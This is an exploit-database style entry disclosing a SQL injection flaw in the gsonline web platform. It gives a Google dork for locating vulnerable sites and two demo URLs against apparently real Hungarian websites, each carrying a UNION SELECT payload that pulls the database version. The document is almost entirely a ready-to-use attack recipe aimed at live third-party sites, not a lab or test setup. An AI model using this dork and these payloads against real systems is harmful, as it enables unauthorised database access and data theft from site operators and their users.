#Exploit Title: gsonline – SQL Injection vulnerability
#Date: 2020-07-08
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://www.gsonline.hu
#Google Dork: "Powered by: gsonline WebNDesign"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Powered by: gsonline WebNDesign"
Demo 1: https://reignsoft.hu/news.php?id=0%27%20union%20select%201,2,3,version(),5,6,7--+
Demo 2: http://www.madisonland.hu/madison/hostess_modell_page.php?gid=559%27%20union%20select%201,version(),3,4,5,6,7--+&lang=en
*********************************************************
#Discovered by: Behrouz mansoori
#instagram: Behrouz_mansoori
*********************************************************